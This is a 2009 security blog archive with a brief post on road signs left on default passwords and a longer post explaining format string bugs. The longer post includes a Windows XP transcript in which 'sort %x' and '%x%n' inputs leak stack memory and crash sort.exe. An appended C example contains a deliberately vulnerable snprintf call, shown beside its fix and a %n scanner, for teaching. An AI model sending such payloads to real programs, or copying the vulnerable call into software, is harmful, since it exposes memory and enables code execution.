
Archive for January, 2009

hacking road signs

Wednesday, January 28th, 2009

This looks like it could be a lot of fun. (You know, if someone were to try that. Not that I would ever participate in or condone such an activity). This just boils down to the fact that yet another embedded device has a default password on it that most people never change. The best protection in this case is probably to just lock the access panel.

Format string attacks in Windows and sort.exe

Monday, January 26th, 2009

Well that was a long and unexpected blogging break. It started because I wanted to write a long and detailed post about the last BGP exploit when I realized how little most security people knew about BGP. Unfortunately I never had time, a bunch of other things demanded my attention (like real life), and then once I got out of the habit of blogging, it was too easy to just ignore it. I’m back though, and I’ll try to blog regularly, albeit perhaps at a slower rate if real life persists in being as time-consuming as it’s been lately.

Since this blog is coming back from a long hiatus, I think perhaps it’s appropriate to do so by bringing back an old vulnerability from a long hiatus as well. Format string vulnerabilities have been around since around 1999. The short explanation is that when a C program hands a buffer it doesn’t control straight to printf (or one of its relatives) as the format string, instead of using a fixed format with a specifier (you know, all those %s things you learned about way back when), any format specifiers the attacker put in that buffer (like %x and %n) get interpreted. %x prints the next argument as hex, and since no argument was actually passed, printf just reads whatever sits where the next argument would be (on x86, the stack), so an attacker can view the stack one word at a time. %n is more insidious: instead of printing anything, it writes the number of characters printed so far to the address held in the next argument, and that address is under the attacker’s influence in the same way. An attacker can use this to overwrite a chosen memory location (like, say, a return address) and execute arbitrary code.

In August of 2004 it was revealed that Windows’ sort.exe had a format string vulnerability. Like most people, I assumed that since the fix for this is trivial (just use a format specifier instead of printing the buffer directly), Microsoft would have fixed it in the next patch release or service pack. Lo and behold, they haven’t. This is a copy and paste from the command shell of my Windows XP machine.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>ver

Microsoft Windows XP [Version 5.1.2600]

C:\>sort %x
7c812f39The system cannot find the file specified.

C:\>sort %x%x
7c812f390The system cannot find the file specified.

C:\>sort %x%x%x
7c812f3900The system cannot find the file specified.

C:\>sort %x%x%x%x
7c812f390078257825The system cannot find the file specified.

C:\>sort %x%x%x%x%x
7c812f39007825782578257825The system cannot find the file specified.

C:\>sort %x%n

(sort.exe crashes as I’ve tried to write data to some random place in memory)

Everyone knows that Microsoft has a reputation for not fixing vulnerabilities unless forced to, but this is bad even by their standards. 4+ years and they haven’t fixed a known format string vulnerability.
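As an added example (not code from the post, and nothing to do with how sort.exe is actually written), here is the contrast described above in C: a function that passes the buffer as the format string, beside the one-line fix, plus a small scanner that counts the conversions an untrusted string would trigger if it were ever misused as a format, and in particular the memory-writing %n. The function names are my own.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable form: the user-controlled buffer IS the format string, so "%x%x"
 * makes printf read arguments that were never passed (the transcript above).
 * The pragma only silences the (correct) warning so both forms compile here. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int echo_vulnerable(char *out, size_t outlen, const char *user)
{
    return snprintf(out, outlen, user);
}
#pragma GCC diagnostic pop

/* Fixed form: constant format, user data is only an argument, so "%x" and
 * "%n" inside it are printed literally and never interpreted. */
int echo_fixed(char *out, size_t outlen, const char *user)
{
    return snprintf(out, outlen, "%s", user);
}

/* Count the conversions s would trigger if misused as a format, and how many
 * are %n (the only one that writes memory). "%%" is a literal and skipped.
 * Handy for flagging input or log fields that should never carry conversions. */
int scan_directives(const char *s, int *writes)
{
    int n = 0;
    *writes = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }           /* escaped percent */
        s++;
        while (*s && strchr("-+ #0123456789.*hlLqjzt", *s)) s++; /* flags/width/prec/length */
        if (!*s) break;                               /* dangling '%' at end */
        n++;
        if (*s == 'n') (*writes)++;
    }
    return n;
}

int main(void)
{
    const char *inputs[] = { "%x%x%x%x%x", "%x%n", "100%% done", "%08x%hhn" };
    char out[64];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int w, n = scan_directives(inputs[i], &w);
        echo_fixed(out, sizeof out, inputs[i]);
        printf("%-12s conversions=%d writes=%d -> \"%s\"\n", inputs[i], n, w, out);
    }
    return 0;
}
```

Run with gcc -Wall and note that the compiler already flags echo_vulnerable on its own; -Wformat-security (or -Werror=format-security) is the cheapest way to keep this class of bug out of a codebase.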

 
Pi is exactly 3!